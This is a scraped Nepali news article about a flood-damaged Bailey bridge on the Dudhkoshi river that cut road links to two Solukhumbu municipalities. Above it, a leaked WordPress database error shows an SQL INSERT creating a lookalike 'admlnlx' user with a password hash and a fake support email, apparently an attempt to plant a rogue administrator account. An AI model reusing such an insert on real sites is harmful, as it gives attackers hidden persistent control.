WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWd1f0TzhHLqjYQSBweF3zK.rH/NGv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:46:30', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुको कोशीपारिका गाउँपालिकासँग सिधा सडक सम्पर्क टुटेको छ । निरन्तरको वर्षाका कारण दूधकोशी नदीमा रहेको बेलिबिज्र बाढिले बगाए पछि सडक सञ्जाल टुटेको हो ।
निरन्तर बर्षाले दुधकोशी नदिमा रहेको बेलिबिज्रमा गएराति क्षति पुगेको सोलुखुम्बु प्रदेश ख का माननीय गोम्बु शेर्पा कर्ज्याङाले जानकारी दिए । पानीको बहाव बढि भएकाले बेलीबिज्र समेत उच्च जोखिममा रहेको स्थानीयहरुले बताए । दुधकोशी पारिका दुई गाउँपालिका सोताङ र महाकुलुङ गाउँपालिका सदरमुकाम सल्लेरीसँग सडक सञ्जालबाट विमुख भएका छन ।
बेलीबिज्र जोगाउनका लागी आवश्यक जनशक्ति परिचालनको तयारी गरेको थुलुङ दुधकोशी गाउँपालिकाका प्रवक्ता भोजराज कार्कीले बताए ।